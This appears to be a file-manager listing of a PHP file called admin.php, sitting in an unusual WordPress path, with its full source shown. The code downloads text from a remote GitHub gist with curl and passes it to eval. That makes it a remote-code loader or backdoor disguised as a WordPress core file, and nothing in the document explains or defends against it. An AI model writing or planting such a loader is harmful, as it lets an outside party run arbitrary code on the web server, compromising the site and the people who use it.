File "admin.php"

Full Path: /home/warrior1/public_html/languages/wp-includes/admin.php
File size: 359 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
    $Url = "https://gist.githubusercontent.com/ManiMan43/11de31117ef25ced828d063c868d9496/raw/1236857759f8d93215ebe251c8716ebc791838b0/1.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo eval('?>'.$output);

?>